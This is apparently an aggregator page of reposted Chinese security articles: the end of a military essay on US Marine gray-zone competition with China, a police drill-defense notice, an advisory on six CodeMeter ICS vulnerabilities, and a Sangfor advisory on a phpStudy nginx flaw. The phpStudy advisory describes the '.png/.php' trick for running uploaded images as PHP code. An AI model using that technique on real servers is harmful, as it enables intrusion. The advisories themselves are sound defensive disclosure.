美军应在哪里优先开展此类初步努力?由于中国经常被认为是美国并驾齐驱的威胁,因此请考虑对付中国的混合方式,例如在南海的军事活动。每种情况都需要着重于挫败支持这些努力的所有国家力量要素的运用,而不仅仅是军事力量,还需要在多机构间协调努力,从而可以运用最可行的应对技术。鉴于其敌对行动的海上性质,这种威胁只适合于与跨机构和联盟要素紧密合作的前沿海军部队。即使当部队“只是”训练以及否则在常规战斗场景外行动,他们的部署和渠道也会创造支持和帮助合作伙伴的机会。

实际上,海军陆战队远征部队仍然可以是一支可选择前沿部署部队,并利用其区域(通常是分散的)部署,以现有能力开展上述努力,同时不参与常规冲突。这些单元还拥有能力很强的规划团队和通信系统,可以协调联合、国家和联盟资产的应用。此外,作为前沿部署的海军部队,它们提供了接入性、机动性和顽存性,这是定点设施经常缺乏的,而对跨机构合作伙伴是有价值的。同时,这种组合还使海军编队成为理想平台,跨接挑战其他军事指挥部门的缝隙和边界开展工作,并解决灰色地带问题。而且,随着即将到来的轻型两栖舰艇加入舰队,利用海军能力的能力只会增加,从而使平台的数量远远超出了传统的三舰两栖战备小组。

我们的目标不是为大国竞争中存在的挑战性问题提供确切的解决方案,而是建议能够识别、协调、实施、完善和共享这些解决方案的部门。应对这些挑战的可行选择将通过以下方式得以显现,包括对问题的最广泛理解、倾向于在对手对这种方法做出反应前采取行动以及与能够带来自身见解和能力的合作伙伴的合作。

一些人可能不同意见灰色地带活动军事参考的建议,因为担心上述公开参与会被中国视为固有升级。尽管许多类型的军事行动可能被视为具有侵略性,但我们认为信息能力(包括通信策略)可以缓解升级动态。在许多情况下,简单地揭示对手的恶意活动就能施加成本,甚至可能会隐含有关可能起到威慑作用能力的信号。一个例子是美国网络司令部的推特账户提供发布外国恶意软件的病毒警报,从而使依赖于保密性的能力效果降低。同样,如果这样的告示被精心纳入持续交战行动,海军将帮助发现和曝光颠覆性的中国活动。

随着海军陆战队将自己重新设计为已经“深入敌后” 的“ 后备力量 ”,它不仅能在危机中对敌人制造物理瞄准问题,还有机会制造认知困境。但是,这种认知效果只有在现在通过持续参与灰色地带竞争而发展起来的情况下,才有可能在未来的敌对行动中发挥作用。将灰色地带竞争活动设想为环境的作战准备,用于最终使用海军陆战队滨海战斗团和扩展后备力量。为了实现这一目标,迫使部队规划人员应确保混合海军陆战队和海军组成人员被充分整合到跨地理作战司令部,并与海军陆战队网络空间司令部可以提供的计划和作战能力紧密联系。这种整合将促使海军陆战队《司令规划指导》要求的远程海军调度运用网络作战,以及更广泛的信息环境作战,以最大程度地抵抗国家竞争者。尽管当前的联合部队地理结构阻碍了跨越作战司令部挥边界的行动,但未来的海军部门应该能够协调和利用跨地区的海军信息力量。例如,驻太平洋的海军部队应该能够发现非洲海岸沿线的机会。我们应该足够轻松和敏捷地让他们能够迅速利用这一机会。要在这方面取得成功,将需要进行精心的部队设计规划,以解决总部和指挥控制能力。

六、结论

大国竞争的特征从持续的灰色地带扰动到可能无意中升级为潜在的完全敌对行动的危机不等。这就需要一支能够在此范围内有效作战的部队。与其创建一支准备好在积极竞争的海上空间内作战的战备部队,美国当前更需要一支确实在积极竞争的海上空间内作战的部队,例如中国南海。

海军部队还没奢侈到可以放弃机动空间或发展专责各种竞争的不同力量。我们的经验表明,同样的力量(应用我们概述的经验教训)现在可以有效地在灰色地带作战,同时仍为潜在的作战区域做准备。现有的、有能力的和前沿部署的海军部队非常适合与重要的联盟和跨机构合作伙伴一起采取长期竞争方式。这种近期努力将进一步为海军陆战队和联合部队的发展提供信息,从而有效地在灰色地带和作战区域与我们的对手竞争并战胜它们。

作者简介

网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

莱恩·安德森准将

 联合特遣部队ARES副司令官

网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

布莱恩·罗素上校

最近担任联合特遣部队ARES的J5,现在指挥位于北卡罗莱纳州勒琼营地的第二海军陆战队远征军信息小组。

网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

内森·弗莱谢克中校

曾担任联合特遣部队ARES计划负责人,现在在斯坦福大学攻读博士(海军陆战队司令战略家计划)。

声明:文章仅供交流参考,不代表本机构立场。

原文始发于微信公众号(网络空间安全军民融合创新中心):网络战战例系列: 美军打击“伊斯兰国”网络战行动启示

广东网警《HW演习防守基础安全指引》全文 (附下载)

微慑管理员阅读(2158)

广东网警《HW演习防守基础安全指引》全文 (附下载)

点击蓝字关注我们

广东网警《HW演习防守基础安全指引》全文 (附下载)

近期,广东省公安厅网络警察总队积极组织广东省网络安全攻防演习,为此次演习制作《HW 演习防守基础安全指引》,以下为全文:

广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
广东网警《HW演习防守基础安全指引》全文 (附下载)
↓ 点击阅读原文下载防守基础安全指引全文

文章来源:广东省网络安全应急响应平台


后台回复“进群”可加入安全内参热点讨论群,获取第一手网络安全热点资讯。

扫描二维码关注我们

广东网警《HW演习防守基础安全指引》全文 (附下载)

互 联 网 安 全 内 参

网络安全首席知识官

转载微信:security_xc

翻译供稿:security4

投稿邮箱:[email protected]

原文始发于微信公众号(互联网安全内参):广东网警《HW演习防守基础安全指引》全文 (附下载)

德国威步公司CodeMeter产品被爆六个严重漏洞使工业控制系统面临重大风险

微慑管理员阅读(1862)

编者按:9月8日,工业网络安全公司Claroty研究人员发布博客文章称,在威步(Wibu-Systems)的CodeMeter第三方许可证管理组件中发现了六个关键漏洞,这些漏洞可能使众多行业的用户面临操作技术(OT)网络的接管。这些漏洞可通过网络钓鱼活动加以利用,也可由攻击者直接利用,攻击者可以对用户环境进行指纹识别,以修改现有软件许可证或注入恶意许可证,从而导致设备和进程崩溃。Claroty也发现了严重的加密实现问题,攻击者可以利用这些问题远程执行代码,并在OT网络上横向移动。

背景概述

背景介绍

工业网络安全公司Claroty 9月8日在其博客上发表文章称,德国Wibu-Systems公司生产的一款流行的许可和DRM解决方案CodeMeter中存在的六个漏洞能会使工业系统遭受远程攻击,包括关闭设备或进程、提供勒索软件或其他恶意软件或执行进一步的利用。
Claroty研究人员在CodeMeter中发现了各种类型的漏洞,包括可用于更改或伪造许可证文件的内存损坏错误和加密漏洞。研究人员展示了如何在无需身份验证的情况下远程利用某些漏洞来发起拒绝服务(DoS)攻击或实现任意代码执行。
在研究人员描述的一种攻击情形中,攻击者建立了一个网站,旨在将恶意许可证推入诱骗该站点的用户的设备。流氓许可证在由CodeMeter处理后,可以生成DoS条件或允许攻击者执行任意代码。在不同的攻击场景中,研究人员通过创建自己的CodeMeter API和客户端来实现远程代码执行,使其能够将命令发送到任何运行CodeMeter的设备。

德国威步公司CodeMeter产品被爆六个严重漏洞使工业控制系统面临重大风险

美国工业控制系统计算机紧急响应小组(ICS-CERT)9月8日也发布了有关这些漏洞的建议,其中一个漏洞的CVSS评分定为10.0,为最高的严重等级。

产品介绍

CodeMeter是专为软件开发商及智能设备企业提供的一体化技术,其所包含的所有解决方案均来自于Wibu-Systems。CodeMeter旨在保护软件免受盗版和逆向工程的侵害,提供许可管理功能,并且包括可防止篡改和其他攻击的安全功能。CodeMeter可用于多种应用,通常用于工业产品中,包括工业PC,IIoT设备和控制器。CodeMeter已被许多领先的ICS软件供应商广泛使用,其中包括罗克韦尔自动化、西门子、施耐德电气、万可及菲尼克斯电气(PHOENIX CONTACT)。
CodeMeter包含以下软件:
  • Protection 保护工具
    用于实现高安全强度的保护软件,防止盗版及逆向工程
  • Licensing 授权工具
    用于实现便捷、安全的软件授权,包括创建灵活的授权模式、整合软件的业务流程,以及采用企业现行的办公后台系统对软件所有的生命周期进行完整的管理。
  • Security 安全工具
    监控软件最终使用者,防止来自第三方的恶意篡改及攻击。

受影响的供应商

罗克韦尔、施耐德、西门子、万可及菲尼克斯电气(PHOENIX CONTACT)都已确认其产品受到这些漏洞的影响。Claroty已发布受影响的供应商列表,该列表会定期更新。受影响公司的客户遍及多个行业,包括医疗设备制造商、汽车制造商、制造商、过程设计人员以及许多其他行业,可能没有意识到这一易受攻击的组件正在其环境中运行。Claroty建立了一个在线实用程序,可以帮助用户确定他们是否正在运行易受攻击的CodeMeter版本。

漏洞详情

漏洞摘要

德国威步公司CodeMeter产品被爆六个严重漏洞使工业控制系统面临重大风险

漏洞描述

CVE-2020-14509 长度值不正确的缓冲区访问(CWE-805)
在数据包解析器机制不验证长度字段的情况下,存在多个内存损坏漏洞。攻击者可以发送特制的数据包来利用这些漏洞进行攻击。计算得出的CVSS v3基本得分为10.0;CVSS向量字符串为(AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H)。
CVE-2020-14517 加密强度不足(CWE-326)
协议加密很容易被破坏,服务器接受外部连接,这可能使攻击者能够远程与CodeMeter API进行通信。已计算出CVSS v3基本分数9.4;CVSS向量字符串为(AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:H / A:H)。
CVE-2020-14519 源验证错误(CWE-346)
此漏洞允许攻击者通过特制的Javascript负载使用内部WebSockets API,当与CVE-2020-14515结合使用时,该负载可能允许使用CmActLicense公司代码更改或创建CmActLicense的许可文件。计算得出的CVSS v3基本得分为8.1;CVSS向量字符串为(AV:N / AC:L / PR:N / UI:R / S:U / C:N / I:H / A:H)。
CVE-2020-14513 输入验证不当(CWE-20)
由于长度字段未经验证,CodeMeter和使用它的软件在处理特别编制的许可证文件时可能会崩溃。已计算出CVSS v3基本得分7.5;CVSS向量字符串为(AV:N / AC:L / PR:N / UI:N / S:U / C:N / I:N / A:H)。
CVE-2020-14515 加密签名验证不当(CWE-347)
许可证文件签名检查机制中存在一个问题,该机制使攻击者可以构建任意许可证文件,包括伪造有效许可证文件,就好像它是现有供应商的有效许可证文件一样。只有带有CmActLicense公司代码的CmActLicense更新文件受影响。计算得出的CVSS v3基本分数为7.4;CVSS向量字符串为(AV:L / AC:H / PR:N / UI:R / S:C / C:N / I:H / A:H)。
CVE-2020-16233 资源关闭或释放不当(CWE-404)
攻击者可以发送特制的数据包,使服务器发回包含堆中数据的数据包。已计算出CVSS v3基本得分7.5;CVSS向量字符串为(AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N)

受影响产品及版本

受影响Wibu-Systems的CodeMeter版本包括:
  • 7.10之前的所有版本均受CVE-2020-14509和CVE-2020-16233的影响。
  • 7.00之前的所有版本均受CVE-2020-14519的影响,包括7.0版或更高版本,并且受影响的WebSockets API仍处于启用状态。这对于使用Web浏览器访问Web服务器的系统或设备尤其重要。
  • 6.81之前的所有版本均受CVE-2020-14513的影响。
  • 6.90之前的所有版本均受CVE-2020-14517的影响,包括6.90或更高版本,仅当CodeMeter Runtime作为服务器运行时才受此影响。
  • 当使用带有CmActLicense公司代码的CmActLicense更新文件时,6.90之前的所有版本均受CVE-2020-14515的影响。许多不同的供应商在产品中使用此许可证管理器。

防护建议

Wibu-Systems已为CodeMeter 7.10版中的所有缺陷提供了补丁,该补丁自8月11日起可用;已通知许多受影响的供应商,并已将修补程序添加到各自的安装程序中,或者正在将修补程序添加到它们各自的安装程序中。
总而言之,为了缓解网络级别的问题,CISA、Claroty、Wibu-Systems、Siemens、Rockwell及WAGO建议采取以下安全防护措施:
  • 最小化所有控制系统设备和/或系统的网络暴露,并确保不能从Internet访问它们;
  • 在防火墙后面找到控制系统网络和远程设备,并将其与业务网络隔离;
  • 当需要进行远程访问时,请使用安全方法,例如虚拟专用网(VPN),并应将其更新为可用的最新版本;
  • 在组织的边界防火墙上阻止TCP端口22350(CodeMeter网络协议),以阻止利用此漏洞;
  • 更新到CodeMeter Runtime的最新版本;
  • 仅以客户端身份运行CodeMeter;
  • 使用新的REST API而不是内部WebSockets API,并禁用WebSockets API;
  • 应用AxProtector;
与Ripple20一样,Wibu Systems CodeMeter中的这些漏洞表明,当普遍存在的安全问题影响到ICS领域中无处不在的第三方组件时,这些漏洞可能会造成危害。使问题进一步恶化的是难以大规模修复第三方组件中发现的关键漏洞。
与单个供应商修补软件并将其推送给客户相比,这要复杂得多;通信必须跨整个OT和ICS生态系统进行,一旦解决了易受攻击的设备,这将影响响应时间和可能的可用性。
 
原文来源:天地和兴

德国威步公司CodeMeter产品被爆六个严重漏洞使工业控制系统面临重大风险

原文始发于微信公众号(网络安全应急技术国家工程实验室):德国威步公司CodeMeter产品被爆六个严重漏洞使工业控制系统面临重大风险

phpStudy内置Nginx组件存在文件解析漏洞

微慑管理员阅读(2757)

漏洞概要

漏洞名称:phpStudy内置Nginx组件文件解析漏洞

威胁等级:高危  

影响范围:phpStudy <= v8.1.0.7 for windows(官方最新版本)

漏洞类型:文件解析 

利用难度:简单

漏洞分析

 

1 phpStudy介绍

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+Nginx+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。

2 漏洞描述

2020年9月3日,深信服安全团队跟踪到phpStudy nginx解析漏洞信息,该漏洞是由于phpStudy中内置的nginx存在错误配置,导致PHP文件解析漏洞,攻击者可以通过***.png/.php形式,将png文件解析为php文件,从而实现任意代码执行。

此漏洞常被用于以下场景:攻击者通过文件上传接口,将恶意代码伪装为正常文件(如png、jpg、txt等)上传至服务器,最后执行恶意代码获取服务器的最高权限。

3 漏洞复现

在官网下载最新版本phpStudy复现该漏洞,如下:

phpStudy内置Nginx组件存在文件解析漏洞

影响范围

目前受影响的phpStudy版本:

phpStudy <= v8.1.0.7 for windows(官方最新版本)

 



解决方案

 

 

1 修复建议

官方暂未修复该漏洞,请受影响的用户及时关注官方获取最新版本的更新:https://www.xp.cn/

2 深信服解决方案

深信服下一代防火墙】可轻松防御此漏洞,建议部署深信服下一代防火墙的用户开启安全防护规则,可轻松抵御此高危风险。

深信服云盾】已第一时间从云端自动更新防护规则,云盾用户无需操作,即可轻松、快速防御此高危风险。

 

深信服安全感知平台】可检测利用该漏洞的攻击,实时告警,并可联动【深信服下一代防火墙等产品】实现对攻击者ip的封堵。

深信服安全运营服务】深信服云端安全专家提供7*24小时持续的安全运营服务。在漏洞爆发之初,对存在漏洞的用户,检查并更新了客户防护设备的策略,确保客户防护设备可以防御此漏洞风险。

 

时间轴

 

2020/9/3

深信服千里目实验室监测到关于phpStudy nginx文件解析漏洞的信息

2020/9/3

深信服千里目实验室分析相关代码,复现漏洞并发布相关解决方案

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案

phpStudy内置Nginx组件存在文件解析漏洞

 

原文始发于微信公众号(深信服千里目安全实验室):phpStudy内置Nginx组件存在文件解析漏洞

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

登录

找回密码

注册